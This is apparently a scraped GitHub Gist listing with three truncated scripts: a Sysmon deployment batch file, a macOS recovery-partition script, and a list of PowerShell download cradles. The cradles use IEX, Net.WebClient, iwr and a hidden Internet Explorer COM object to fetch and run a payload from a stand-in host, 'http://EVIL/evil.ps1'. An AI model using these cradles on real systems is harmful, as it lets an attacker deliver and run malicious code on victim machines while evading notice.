kcustom11
silentbreaksec
/ SysmonStartup.bat
Created
March 2, 2018 23:39
Windows batch file to deploy Sysmon using a startup script via GPO
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| :: Author: Ryan Watson | |
| :: Twitter: @gentlemanwatson | |
| :: Version: 1.0 | |
| :: Credits: Credit to Syspanda.com and their Sysmon GPO article for the kick off point | |
| :: https://www.syspanda.com/index.php/2017/02/28/deploying-sysmon-through-gpo/ | |
| :: ** IMPORTANT ** | |
| :: 1) Create a Sysmon folder with the SYSVOL share on your domain controller | |
| :: 2) Download Sysmon from Microsoft and place both sysmon.exe and sysmon64.exe in |
davidjb
/ recovery.sh
Created
December 21, 2016 08:21
Create macOS Sierra Recovery Partition Without Reinstalling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TARGET="/Volumes/Macintosh HD" # Specify where to configure Recovery partition | |
| MACOS_INSTALLER="/Applications/Install\ macOS\ Sierra.app" # Path to your macOS installer | |
| # Remaining paths ahead are dependant on OS version | |
| # This *should* support 10.9 and above but is only tested on 10.12 | |
| curl http://support.apple.com/downloads/DL1464/en_US/RecoveryHDUpdate.dmg -L -o ~/Downloads/RecoveryHDUpdate.dmg | |
| hdiutil mount ~/Downloads/RecoveryHDUpdate.dmg | |
| pkgutil --expand /Volumes/Mac\ OS\ X\ Lion\ Recovery\ HD\ Update/RecoveryHDUpdate.pkg /tmp/recoveryupdate |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |